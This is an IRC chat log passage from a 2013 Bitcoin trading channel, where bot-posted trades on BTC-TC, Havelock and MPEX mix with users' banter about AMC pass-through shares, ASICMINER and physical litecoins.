0.033511 BTC [-] Jun 27 21:24:54 TAT bleeding incoming!!!! Jun 27 21:25:19 :P Jun 27 21:26:17 [BTCTC] [TAT.ASICMINER] 12 @ 0.0333 = 0.3996 BTC [-] Jun 27 21:26:43 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jun 27 21:27:03 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jun 27 21:29:58 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 21:30:29 [HAVELOCK] [ASICM] 11 @ 0.03401 = 0.3741 BTC [+] Jun 27 21:31:31 "What is your take, then, on the fact that the pass-through for AMC was approved on btct? bad idea?" Jun 27 21:32:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.0332 = 0.0664 BTC [-] Jun 27 21:32:53 [BTCTC] [TAT.ASICMINER] 56 @ 0.03301 = 1.8486 BTC [-] Jun 27 21:33:15 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [-] Jun 27 21:33:17 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 21:35:05 [BTCTC] [S.DICE-PT] 32 @ 0.002049 = 0.0656 BTC [-] Jun 27 21:35:44 [BTCTC] [GSDPT] 25 @ 0.002115 = 0.0529 BTC [-] Jun 27 21:37:24 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [-] Jun 27 21:38:26 [BTCTC] [AMC-PT] 7980 @ 0.0025 = 19.95 BTC [-] Jun 27 21:38:27 [BTCTC] [ASICMINER-PT] 1 @ 3.267001 BTC [+] Jun 27 21:38:50 [BTCTC] [ASICMINER-PT] 1 @ 3.267 BTC [-] Jun 27 21:38:52 [BTCTC] [ASICMINER-PT] 9 @ 3.266101 = 29.3949 BTC [-] Jun 27 21:39:11 i welcome the bleeding Jun 27 21:39:21 i sold a bunch at 3.45, like a good boy Jun 27 21:40:05 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 21:40:09 [BTCTC] [AMC-PT] 1300 @ 0.0025 = 3.25 BTC [-] Jun 27 21:40:36 [BTCTC] [TAT.ASICMINER] 24 @ 0.03301 = 0.7922 BTC [-] Jun 27 21:40:39 hehe Jun 27 21:40:59 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [-] Jun 27 21:41:02 hehe this one is good Jun 27 21:41:04 That pass through is awesome! Jun 27 21:41:04 Ken is releasing it at 0.0025 BTC / share. Each share being 1 /100 000 000 of AMC (see the bitfunder profile page). Jun 27 21:41:04 So you get a market cap of 250 000 BTC, or $25M US at $100/BTC. Jun 27 21:41:04 That works out to $4.1M per Avalon machine! Jun 27 21:41:04 LOL. Yifu must be pissed. Jun 27 21:41:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.033001 = 0.066 BTC [-] Jun 27 21:41:40 good one hehe Jun 27 21:41:42 [BTCTC] [ASICMINER-PT] 1 @ 3.266102 BTC [+] Jun 27 21:41:52 [BTCTC] [ASICMINER-PT] 7 @ 3.266101 = 22.8627 BTC [-] Jun 27 21:41:54 lol Jun 27 21:42:06 [BTCTC] [ASICMINER-PT] 3 @ 3.266102 = 9.7983 BTC [+] Jun 27 21:42:13 [BTCTC] [ASICMINER-PT] 16 @ 3.266103 = 52.2576 BTC [+] Jun 27 21:42:15 [BTCTC] [ASICMINER-PT] 12 @ 3.266101 = 39.1932 BTC [-] Jun 27 21:42:17 [BTCTC] [ASICMINER-PT] 5 @ 3.2661 = 16.3305 BTC [-] Jun 27 21:42:19 [BTCTC] [ASICMINER-PT] 7 @ 3.266 = 22.862 BTC [-] Jun 27 21:42:22 lol $25m/avalon Jun 27 21:42:23 thtas hiliarous Jun 27 21:42:35 [BTCTC] [TAT.ASICMINER] 14 @ 0.033 = 0.462 BTC [-] Jun 27 21:42:37 [BTCTC] [TAT.ASICMINER] 5 @ 0.033 = 0.165 BTC [-] Jun 27 21:42:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.033 = 0.165 BTC [-] Jun 27 21:42:40 [BTCTC] [TAT.ASICMINER] 59 @ 0.03295 = 1.9441 BTC [-] Jun 27 21:42:41 [BTCTC] [TAT.ASICMINER] 20 @ 0.032901 = 0.658 BTC [-] Jun 27 21:42:42 [BTCTC] [TAT.ASICMINER] 197 @ 0.0329 = 6.4813 BTC [-] Jun 27 21:43:26 [BTCTC] [TAT.ASICMINER] 44 @ 0.0329 = 1.4476 BTC [-] Jun 27 21:43:39 [BTCTC] [ASICMINER-PT] 1 @ 3.266102 BTC [+] Jun 27 21:44:04 [MPEX] [S.MPOE] 16814 @ 0.00083097 = 13.9719 BTC [+] Jun 27 21:44:37 [BTCTC] [TAT.ASICMINER] 123 @ 0.0328 = 4.0344 BTC [-] Jun 27 21:46:25 [BTCTC] [TAT.ASICMINER] 81 @ 0.032801 = 2.6569 BTC [+] Jun 27 21:47:17 bid wall Jun 27 21:47:26 ThickAsThieves: that thread is pure candy hahahaha Jun 27 21:47:26 158 @ 3.267 Jun 27 21:47:32 i'm so tempted Jun 27 21:47:55 [BTCTC] [AMC-PT] 10 @ 0.0025 = 0.025 BTC [-] Jun 27 21:48:27 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 21:50:22 [BTCTC] [TAT.ASICMINER] 22 @ 0.033882 = 0.7454 BTC [+] Jun 27 21:51:19 [BTCTC] [AMC-PT] 880 @ 0.0025 = 2.2 BTC [-] Jun 27 21:51:43 [BTCTC] [TAT.ASICMINER] 45 @ 0.033881 = 1.5246 BTC [-] Jun 27 21:52:10 ThickAsThieves: do eeet Jun 27 21:53:00 hold Jun 27 21:53:03 hollllld Jun 27 21:53:33 [BTCTC] [AMC-PT] 4040 @ 0.0025 = 10.1 BTC [-] Jun 27 21:55:19 [BTCTC] [TAT.ASICMINER] 8 @ 0.033 = 0.264 BTC [-] Jun 27 21:56:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Jun 27 21:56:46 [BTCTC] [AMC-PT] 75 @ 0.0025 = 0.1875 BTC [-] Jun 27 21:56:50 [BTCTC] [ASICMINER-PT] 1 @ 3.268001 BTC [+] Jun 27 21:56:52 [HAVELOCK] [ASICM] 2 @ 0.03401 = 0.068 BTC [+] Jun 27 21:57:19 [BTCTC] [AMC-PT] 79 @ 0.0025 = 0.1975 BTC [-] Jun 27 21:58:10 [BTCTC] [AMC-PT] 2 @ 0.0025 = 0.005 BTC [-] Jun 27 21:59:11 [HAVELOCK] [ASICM] 8 @ 0.0339 = 0.2712 BTC [-] Jun 27 21:59:12 [HAVELOCK] [ASICM] 15 @ 0.033899 = 0.5085 BTC [-] Jun 27 21:59:14 [HAVELOCK] [ASICM] 3 @ 0.0338 = 0.1014 BTC [-] Jun 27 21:59:15 [HAVELOCK] [ASICM] 74 @ 0.03350002 = 2.479 BTC [-] Jun 27 21:59:24 [HAVELOCK] [ASICM] 9 @ 0.03350002 = 0.3015 BTC [-] Jun 27 21:59:57 [BTCTC] [AMC-PT] 3 @ 0.0025 = 0.0075 BTC [-] Jun 27 22:04:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [-] Jun 27 22:04:37 [BTCTC] [DMS.PURCHASE] 60 @ 0.053705 = 3.2223 BTC [-] Jun 27 22:05:47 [BTCTC] [AMC-PT] 3500 @ 0.0025 = 8.75 BTC [-] Jun 27 22:06:30 [BTCTC] [AMC-PT] 40 @ 0.0025 = 0.1 BTC [-] Jun 27 22:07:34 ThickAsThieves: THINK OF THE KITTENS Jun 27 22:07:46 [BTCTC] [TAT.ASICMINER] 55 @ 0.032803 = 1.8042 BTC [-] Jun 27 22:08:09 the kitten committee is telling me to sell Jun 27 22:08:18 [BTCTC] [DMS.PURCHASE] 25 @ 0.053705 = 1.3426 BTC [-] Jun 27 22:08:22 but they think only of themselves Jun 27 22:08:48 [BTCTC] [AMC-PT] 14 @ 0.0025 = 0.035 BTC [-] Jun 27 22:09:38 [BTCTC] [TAT.ASICMINER] 21 @ 0.032803 = 0.6889 BTC [-] Jun 27 22:09:40 [BTCTC] [TAT.ASICMINER] 9 @ 0.0328 = 0.2952 BTC [-] Jun 27 22:10:05 [BTCTC] [DMS.MINING] 9 @ 0.0215 = 0.1935 BTC [+] Jun 27 22:10:36 [BTCTC] [DMS.MINING] 10 @ 0.021213 = 0.2121 BTC [-] Jun 27 22:10:50 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [-] Jun 27 22:10:56 [BTCTC] [DMS.MINING] 30 @ 0.02113 = 0.6339 BTC [-] Jun 27 22:11:29 [BTCTC] [DMS.MINING] 15 @ 0.02112 = 0.3168 BTC [-] Jun 27 22:11:46 [BTCTC] [DMS.MINING] 2 @ 0.021771 = 0.0435 BTC [+] Jun 27 22:12:08 [BTCTC] [AMC-PT] 800 @ 0.0025 = 2 BTC [-] Jun 27 22:12:57 [BTCTC] [TAT.ASICMINER] 22 @ 0.0328 = 0.7216 BTC [-] Jun 27 22:13:16 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [-] Jun 27 22:13:26 [BTCTC] [RSM] 5 @ 0.0211 = 0.1055 BTC [-] Jun 27 22:13:58 ;;nethash Jun 27 22:13:59 156705.371448 Jun 27 22:13:59 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jun 27 22:14:03 [BTCTC] [AMC-PT] 2000 @ 0.0025 = 5 BTC [-] Jun 27 22:14:06 [BTCTC] [AMC-PT] 287 @ 0.0025 = 0.7175 BTC [-] Jun 27 22:14:16 shit people are eating AMC up Jun 27 22:15:18 [BTCTC] [TAT.VIRTUALMINE] 76 @ 0.005 = 0.38 BTC [-] Jun 27 22:15:19 "people". Jun 27 22:15:27 whats amc Jun 27 22:15:43 all such scams start by the guy buying his own shit Jun 27 22:15:46 they usually end there too. Jun 27 22:16:01 by now btc is too smart to actually do this shit. if ripple failed this crap has not a prayer. Jun 27 22:16:11 American Mining Con Jun 27 22:16:20 Con?? Jun 27 22:16:22 [BTCTC] [AMC-PT] 2500 @ 0.0025 = 6.25 BTC [-] Jun 27 22:16:28 i assume Jun 27 22:16:39 [BTCTC] [TAT.VIRTUALMINE] 24 @ 0.005 = 0.12 BTC [-] Jun 27 22:17:46 [BTCTC] [AMC-PT] 650 @ 0.0025 = 1.625 BTC [-] Jun 27 22:18:03 you'd think they'd at least wait for this evening's special announcement Jun 27 22:18:13 there's a countdown timer and everything! Jun 27 22:18:29 [BTCTC] [COGNITIVE] 1 @ 0.499999 BTC [+] Jun 27 22:18:31 [BTCTC] [COGNITIVE] 5 @ 0.509966 = 2.5498 BTC [+] Jun 27 22:20:09 Look at Cognitive too. It's up aroud 100% in just over a week and there isn't even interesting news. People are mining crazy! Jun 27 22:20:23 IT'S A GOLD RUSH! QUICK! EVERYONE BUY SHOVELS! Jun 27 22:20:55 how do i get into the pitchfork business? Jun 27 22:21:21 That's for when the mining market turns into a farmer's market. Jun 27 22:21:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.032804 BTC [+] Jun 27 22:21:31 [BTCTC] [ASICMINER-PT] 5 @ 3.330967 = 16.6548 BTC [+] Jun 27 22:21:33 [BTCTC] [ASICMINER-PT] 1 @ 3.330973 BTC [+] Jun 27 22:21:35 [BTCTC] [ASICMINER-PT] 20 @ 3.33099 = 66.6198 BTC [+] Jun 27 22:21:37 [BTCTC] [ASICMINER-PT] 5 @ 3.3395 = 16.6975 BTC [+] Jun 27 22:22:23 No matter what today's AMC news; with 1,6 million new shares there will be far too many sellers afterwards. I'm staying out, methinks... Jun 27 22:22:24 [BTCTC] [AMC-PT] 35555 @ 0.0025 = 88.8875 BTC [-] Jun 27 22:22:54 [BTCTC] [ASICMINER-PT] 1 @ 3.3888 BTC [+] Jun 27 22:22:56 [HAVELOCK] [ASICM] 1 @ 0.03401 BTC [+] Jun 27 22:23:05 [BTCTC] [TAT.ASICMINER] 15 @ 0.0328 = 0.492 BTC [-] Jun 27 22:23:51 [BTCTC] [TAT.ASICMINER] 15 @ 0.0329 = 0.4935 BTC [+] Jun 27 22:24:11 If Ken wants to go down in history at any cost, his announcement today would be that everything had gone to hell and he just wanted to cash out to fund his new place in Belize. Jun 27 22:24:47 [BTCTC] [ASICMINER-PT] 1 @ 3.3898 BTC [+] Jun 27 22:24:51 dont try and undercut Ken Jun 27 22:25:30 whats the ETA on the news Jun 27 22:25:42 Gold... under $1200. Jun 27 22:25:44 when all shares are sold? ;) Jun 27 22:25:46 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [-] Jun 27 22:25:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.033 = 0.165 BTC [+] Jun 27 22:25:51 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 22:25:52 .bait Jun 27 22:25:56 http://25.media.tumblr.com/705d928c4d30581ffd6839f25c90c244/tumblr_mhxl80qQaD1rknfuoo1_1280.jpg Jun 27 22:26:17 .bait Jun 27 22:26:33 4 hours or around there, I think Jun 27 22:26:39 [BTCTC] [COGNITIVE] 1 @ 0.534 BTC [+] Jun 27 22:26:43 http://24.media.tumblr.com/4c5977ab28070628219a598f2828a269/tumblr_mkjz9vK0TQ1qa895jo1_1280.jpg Jun 27 22:26:59 what is this AMC news? is it announced yet ? Jun 27 22:27:18 [BTCTC] [AMC-PT] 300 @ 0.0025 = 0.75 BTC [-] Jun 27 22:27:20 about 3.5 hours from now Jun 27 22:27:29 im excited Jun 27 22:27:31 .bait Jun 27 22:27:31 the world waits in anticipation Jun 27 22:27:35 http://25.media.tumblr.com/4963ef1d88decfa90170494c4faf2c1d/tumblr_ml3jsk6tqH1rxh9hco1_500.jpg Jun 27 22:27:44 The news will be that kslaughter is Satoshi. Jun 27 22:27:58 at least in this room there is no btich going "pay me btc now here pls cmon one for the whores" after pic is posted Jun 27 22:28:00 [MPEX] [S.MPOE] 5100 @ 0.00083386 = 4.2527 BTC [+] Jun 27 22:28:11 Heh... Jun 27 22:28:12 [BTCTC] [ASICMINER-PT] 10 @ 3.4 = 34 BTC [+] Jun 27 22:28:23 amc to 1btc Jun 27 22:29:00 It's going to be a hard fall, but not for Ken Jun 27 22:29:08 Chillax, there's still 1.6 million shares offered just on BTCT. You can easily pick those up for hours still, probably even until after the news. Jun 27 22:29:12 screw amc Jun 27 22:29:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [+] Jun 27 22:29:21 [MPEX] [S.MPOE] 1000 @ 0.00083406 = 0.8341 BTC [+] Jun 27 22:30:08 the problem with all this idiocy is what it always was : fucking irresponsible idiots causing problems across the entire board. Jun 27 22:30:22 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jun 27 22:30:29 if i had any doubts about whether "the people" should never be allowed to handle their own capital, bitcoin is well curing all that. Jun 27 22:30:57 [BTCTC] [GSDPT] 11 @ 0.002415 = 0.0266 BTC [+] Jun 27 22:31:40 [BTCTC] [AMC-PT] 15 @ 0.0025 = 0.0375 BTC [-] Jun 27 22:31:45 [BTCTC] [S.DICE-PT] 1 @ 0.002299 BTC [+] Jun 27 22:31:57 [BTCTC] [AMC-PT] 250 @ 0.0025 = 0.625 BTC [-] Jun 27 22:32:38 [MPEX] [S.MPOE] 1942 @ 0.00083397 = 1.6196 BTC [-] Jun 27 22:32:39 [MPEX] [S.MPOE] 786 @ 0.00083184 = 0.6538 BTC [-] Jun 27 22:33:03 financial darwinism Jun 27 22:33:23 [MPEX] [S.DICE] 500 @ 0.00219979 = 1.0999 BTC [-] Jun 27 22:33:28 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [-] Jun 27 22:34:31 [BTCTC] [TAT.ASICMINER] 27 @ 0.0329 = 0.8883 BTC [-] Jun 27 22:34:33 [BTCTC] [TAT.ASICMINER] 78 @ 0.0329 = 2.5662 BTC [-] Jun 27 22:35:06 [BTCTC] [ASICMINER-PT] 1 @ 3.408 BTC [+] Jun 27 22:35:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.033 BTC [+] Jun 27 22:35:48 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [-] Jun 27 22:36:09 https://bitcointalk.org/index.php?topic=106391.0 Jun 27 22:36:11 that. Jun 27 22:36:14 Personal responsiblity and the Ponzi scam. Jun 27 22:37:06 [BTCTC] [TAT.ASICMINER] 25 @ 0.033 = 0.825 BTC [+] Jun 27 22:37:19 [BTCTC] [ASICMINER-PT] 1 @ 3.314003 BTC [-] Jun 27 22:38:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.033865 BTC [+] Jun 27 22:39:29 [BTCTC] [AMC-PT] 17 @ 0.002499 = 0.0425 BTC [-] Jun 27 22:39:33 [BTCTC] [AMC-PT] 63 @ 0.002499 = 0.1574 BTC [-] Jun 27 22:39:35 [BTCTC] [AMC-PT] 137 @ 0.0025 = 0.3425 BTC [+] Jun 27 22:39:45 Thanks ozbot Jun 27 22:39:54 .bait Jun 27 22:39:57 http://24.media.tumblr.com/91b648e82b0fcf31bea556e63c69d1a1/tumblr_mnsbaj5xfW1rvcjsjo1_1280.jpg Jun 27 22:40:07 KingCoin that works in pm also Jun 27 22:40:07 [HAVELOCK] [ASICM] 24 @ 0.033201 = 0.7968 BTC [-] Jun 27 22:40:08 [HAVELOCK] [ASICM] 110 @ 0.033201 = 3.6521 BTC [-] Jun 27 22:40:09 [HAVELOCK] [ASICM] 1 @ 0.0332001 BTC [-] Jun 27 22:40:11 [HAVELOCK] [ASICM] 37 @ 0.03320001 = 1.2284 BTC [-] Jun 27 22:40:12 [HAVELOCK] [ASICM] 10 @ 0.03315 = 0.3315 BTC [-] Jun 27 22:40:13 [HAVELOCK] [ASICM] 10 @ 0.0331457 = 0.3315 BTC [-] Jun 27 22:40:14 [HAVELOCK] [ASICM] 1 @ 0.03314562 BTC [-] Jun 27 22:40:15 [HAVELOCK] [ASICM] 1 @ 0.03314561 BTC [-] Jun 27 22:40:16 [HAVELOCK] [ASICM] 4 @ 0.03303602 = 0.1321 BTC [-] Jun 27 22:40:16 ok Jun 27 22:40:16 [HAVELOCK] [ASICM] 1 @ 0.033 BTC [-] Jun 27 22:40:17 [HAVELOCK] [ASICM] 1 @ 0.0326 BTC [-] Jun 27 22:40:18 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jun 27 22:40:19 [HAVELOCK] [ASICM] 1 @ 0.0325 BTC [-] Jun 27 22:40:20 [HAVELOCK] [ASICM] 44 @ 0.0325 = 1.43 BTC [-] Jun 27 22:40:21 [HAVELOCK] [ASICM] 500 @ 0.0325 = 16.25 BTC [-] Jun 27 22:40:22 [HAVELOCK] [ASICM] 75 @ 0.0323 = 2.4225 BTC [-] Jun 27 22:40:23 [HAVELOCK] [ASICM] 1 @ 0.0323 BTC [-] Jun 27 22:40:24 [HAVELOCK] [ASICM] 179 @ 0.0323 = 5.7817 BTC [-] Jun 27 22:40:26 [HAVELOCK] [ASICM] 700 @ 0.0323 = 22.61 BTC [-] Jun 27 22:40:57 [HAVELOCK] [ASICM] 21 @ 0.0323 = 0.6783 BTC [-] Jun 27 22:40:57 [HAVELOCK] [ASICM] 55 @ 0.031101 = 1.7106 BTC [-] Jun 27 22:40:59 [HAVELOCK] [ASICM] 515 @ 0.031 = 15.965 BTC [-] Jun 27 22:41:38 Hang on... Jun 27 22:41:41 [BTCTC] [AMC-PT] 2377 @ 0.0025 = 5.9425 BTC [+] Jun 27 22:41:58 [BTCTC] [AMC-PT] 110 @ 0.0025 = 0.275 BTC [+] Jun 27 22:42:03 lol Jun 27 22:42:17 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jun 27 22:42:43 SPRINGFIELD, MO, – June 26, 2013 – Active Mining Corporation (AMC) is announcing today the release of 2,000,000 shares at a price of 0.0025, in preparation for tomorrow's announcement concerning recent developments in their Research and Development program. Jun 27 22:43:05 [BTCTC] [GSDPT] 40 @ 0.002115 = 0.0846 BTC [-] Jun 27 22:43:07 [BTCTC] [GSDPT] 70 @ 0.002115 = 0.1481 BTC [-] Jun 27 22:43:18 Why is there 1.5 million shares for sale on Bitfunder and 1.6 million shares on BTCT? Jun 27 22:43:24 [BTCTC] [AMC-PT] 21 @ 0.0025 = 0.0525 BTC [+] Jun 27 22:43:28 [BTCTC] [AMC-PT] 9 @ 0.0025 = 0.0225 BTC [+] Jun 27 22:43:35 I don't have my calculator available, but the sum of those aren't 2 million. Jun 27 22:43:47 lol Jun 27 22:43:57 you have gribble man Jun 27 22:44:02 ozbot could u help us Jun 27 22:44:02 And that still doesn't account for anything that's been sold. Jun 27 22:44:03 ;;calc 1.5+1.6 Jun 27 22:44:03 3.1 Jun 27 22:44:14 see Jun 27 22:44:15 I think I was making a funny, but I seem to have failed. Jun 27 22:44:20 i know Jun 27 22:44:24 it was funny Jun 27 22:44:27 ya Jun 27 22:44:31 i luld Jun 27 22:44:39 [HAVELOCK] [ASICM] 9 @ 0.031 = 0.279 BTC [-] Jun 27 22:44:49 apparently i failed at continuing the joke Jun 27 22:44:55 weeelll, but it's "Springfield, MO" Jun 27 22:44:57 what divs are to be expected on rentalstarter Jun 27 22:45:13 this is how serious business goes, you add "from the desk of Joe Douche" in there and it's proof. Jun 27 22:45:20 like people expect i cant do 1.5+1.6 in my head Jun 27 22:45:24 :\ Jun 27 22:45:41 [BTCTC] [AMC-PT] 6 @ 0.0025 = 0.015 BTC [+] Jun 27 22:47:06 [BTCTC] [AMC-PT] 1200 @ 0.0025 = 3 BTC [+] Jun 27 22:47:11 [BTCTC] [COGNITIVE] 3 @ 0.490004 = 1.47 BTC [-] Jun 27 22:47:13 [BTCTC] [COGNITIVE] 1 @ 0.490003 BTC [-] Jun 27 22:47:41 oh we have physical litecoins now Jun 27 22:48:12 and they're silver Jun 27 22:48:25 they dont look so bad Jun 27 22:48:52 [HAVELOCK] [ASICM] 103 @ 0.031011 = 3.1941 BTC [+] Jun 27 22:49:15 [BTCTC] [AMC-PT] 1200 @ 0.0025 = 3 BTC [+] Jun 27 22:49:55 Heading to lunch. I don't expect to be surprised when I get back. I have been wrong before. Jun 27 22:50:07 this entire physical coins thing is so weird. Jun 27 22:50:18 we've gone to all this trouble to make them nonphysical... Jun 27 22:50:22 lol Jun 27 22:50:50 yeah i want some of those litecoins Jun 27 22:51:01 physical litecoins Jun 27 22:51:05 the price of cascacius coins makes them not worth it Jun 27 22:51:21 however those litecoins look real nice. it will depend on the price… Jun 27 22:51:55 At current market rates I will be charging 25 LTC per coin (this includes the 10 LTC to fund the coin). This is subject to change without notice based on market fluctuations. Jun 27 22:51:58 litecoins biggest advantage: nice physical coin Jun 27 22:52:14 .bate Jun 27 22:52:22 .ban Jun 27 22:52:23 [BTCTC] [AMC-PT] 30 @ 0.0025 = 0.075 BTC [+] Jun 27 22:52:24 .bait Jun 27 22:52:29 http://25.media.tumblr.com/ee30f30175d7d27713d3f4c79a6e35f2/tumblr_mna8p88vLY1rhpacyo1_1280.jpg Jun 27 22:52:40 thats soom good bait Jun 27 22:52:50 Jezzz: make that shit echo to pvt Jun 27 22:52:56 good choice ozbot Jun 27 22:53:10 [BTCTC] [BITVPS] 14 @ 0.001001 = 0.014 BTC [+] Jun 27 22:53:10 .botsnack Jun 27 22:54:17 [BTCTC] [DMS.MINING] 8 @ 0.021728 = 0.1738 BTC [-] Jun 27 22:54:31 [BTCTC] [AMC-PT] 100 @ 0.0025 = 0.25 BTC [+] Jun 27 22:55:16 .bait Jun 27 22:55:22 http://25.media.tumblr.com/tumblr_mai5jn7tBQ1qdoqhwo1_500.jpg Jun 27 22:55:23 [HAVELOCK] [ASICM] 1 @ 0.032597 BTC [+] Jun 27 22:55:33 weak Jun 27 22:56:47 [MPEX] [S.MPOE] 6722 @ 0.00083029 = 5.5812 BTC [-] Jun 27 22:56:51 [BTCTC] [AMC-PT] 7 @ 0.0025 = 0.0175 BTC [+] Jun 27 22:57:27 [BTCTC] [AMC-PT] 75 @ 0.0025 = 0.1875 BTC [+] Jun 27 22:57:57 ThickAsThieves hey, you're keeping track. how much btc per share did asicminer pay past three months ? Jun 27 22:57:59 total. Jun 27 22:58:36 [BTCTC] [TAT.ASICMINER] 12 @ 0.033331 = 0.4 BTC [-] Jun 27 22:59:01 [BTCTC] [AMC-PT] 70 @ 0.0025 = 0.175 BTC [+] Jun 27 22:59:01 ozbot should pull from http://theworstdrug.com Jun 27 22:59:59 [BTCTC] [AMC-PT] 160 @ 0.0025 = 0.4 BTC [+] Jun 27 23:00:10 mp: per the history tab at https://btct.co/security/ASICMINER-PT the last 90 days paid out 0.28043419 per share Jun 27 23:00:59 [BTCTC] [AMC-PT] 600 @ 0.0025 = 1.5 BTC [+] Jun 27 23:01:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.033842 BTC [+] Jun 27 23:01:13 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jun 27 23:01:24 [BTCTC] [AMC-PT] 93 @ 0.0025 = 0.2325 BTC [+] Jun 27 23:02:41 [BTCTC] [AMC-PT] 20 @ 0.0025 = 0.05 BTC [+] Jun 27 23:03:04 [BTCTC] [TAT.ASICMINER] 15 @ 0.03333 = 0.5 BTC [-] Jun 27 23:04:04 [BTCTC] [AMC-PT] 4 @ 0.0025 = 0.01 BTC [+] Jun 27 23:05:46 [BTCTC] [ASICMINER-PT] 1 @ 3.320003 BTC [+] Jun 27 23:07:18 [BTCTC] [PAJKA.BOND] 1 @ 0.055 BTC [-] Jun 27 23:07:21 [BTCTC] [AMC-PT] 833 @ 0.0025 = 2.0825 BTC [+] Jun 27 23:07:23 [BTCTC] [TAT.ASICMINER] 5 @ 0.03333 = 0.1667 BTC [-] Jun 27 23:08:13 [BTCTC] [ASICMINER-PT] 3 @ 3.330003 = 9.99 BTC [+] Jun 27 23:08:41 [BTCTC] [TAT.ASICMINER] 10 @ 0.033834 = 0.3383 BTC [+] Jun 27 23:09:16 a tyvm aknap3 Jun 27 23:10:19 [BTCTC] [AMC-PT] 166 @ 0.0025 = 0.415 BTC [+] Jun 27 23:15:25 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jun 27 23:16:12 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jun 27 23:18:20 [BTCTC] [DMS.MINING] 8 @ 0.021772 = 0.1742 BTC [+] Jun 27 23:21:57 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jun 27 23:21:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.0335 BTC [-] Jun 27 23:22:21 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jun 27 23:26:57 [BTCTC] [AMC-PT] 200 @ 0.0025 = 0.5 BTC [+] Jun 27 23:30:57 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jun 27 23:31:44 someone just buy up all the AMC already so i can dump at 2x Jun 27 23:32:05 [BTCTC] [AMC-PT] 140 @ 0.0025 = 0.35 BTC [+] Jun 27 23:33:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.0335 BTC [-] Jun 27 23:33:59 [BTCTC] [AMC-PT] 50 @ 0.0025 = 0.125 BTC [+] Jun 27 23:37:02 clearly not enough people buying, the scam is way too big Jun 27 23:38:08 [BTCTC] [AMC-PT] 1000 @ 0.0025 = 2.5 BTC [+] Jun 27 23:42:50 [BTCTC] [ASICMINER-PT] 1 @ 3.334003 BTC [+] Jun 27 23:43:13 [BTCTC] [ASICMINER-PT] 1 @ 3.334001 BTC [-] Jun 27 23:46:41 [BTCTC] [AMC-PT] 400 @ 0.0025 = 1 BTC [+] Jun 27 23:48:14 http://finance.yahoo.com/news/sec-investigating-data-release-reuters-193643021.html Jun 27 23:48:18 SEC Investigating Data Release From Reuters, ISM - Yahoo! Finance Jun 27 23:48:29 Nanex data show as many as 30,000 shares of SPY traded in 1 millisecond during the course of the 15 millisecond gap between the inadvertent release and the official public dissemination of the information that day. Jun 27 23:50:12 happens all the time Jun 27 23:50:24 can't regulate information symmetry Jun 27 23:55:15 someone's already underselling AMC-PT Jun 27 23:56:18 should be easy enough to find who did it. Jun 27 23:56:28 and should be even easier to know nothin' doin'. Jun 28 00:21:22 ;;goxlag Jun 28 00:21:22 MtGox lag is 1.909351 seconds. During this time, light travels 0.00382631802584 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). Jun 28 00:22:15 lol it's back ? Jun 28 00:22:47 its weird, there are no trades Jun 28 00:23:00 at least fuck all Jun 28 00:24:10 http://25.media.tumblr.com/tumblr_mcj8wl59A01qberu7o1_500.png Jun 28 00:24:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0329 BTC [-] Jun 28 00:25:09 [BTCTC] [AMC-PT] 10000 @ 0.0025 = 25 BTC [+] Jun 28 00:29:07 [BTCTC] [AMC-PT] 6000 @ 0.0025 = 15 BTC [+] Jun 28 00:29:32 [HAVELOCK] [ASICM] 1 @ 0.032595 BTC [-] Jun 28 00:31:55 [HAVELOCK] [ASICM] 259 @ 0.032595 = 8.4421 BTC [-] Jun 28 00:32:03 [HAVELOCK] [ASICM] 55 @ 0.032596 = 1.7928 BTC [+] Jun 28 00:32:22 [HAVELOCK] [ASICM] 50 @ 0.0326009 = 1.63 BTC [+] Jun 28 00:33:54 [BTCTC] [CRYPTO-TRADE] 200 @ 0.2 = 40 BTC [+] Jun 28 00:34:24 weee Jun 28 00:34:27 uptime is 13 years, 20 hours, 43 minutes Jun 28 00:34:33 made it Jun 28 00:36:51 [HAVELOCK] [ASICM] 809 @ 0.0326009 = 26.3741 BTC [+] Jun 28 00:38:29 decent Jun 28 00:38:36 but not a record Jun 28 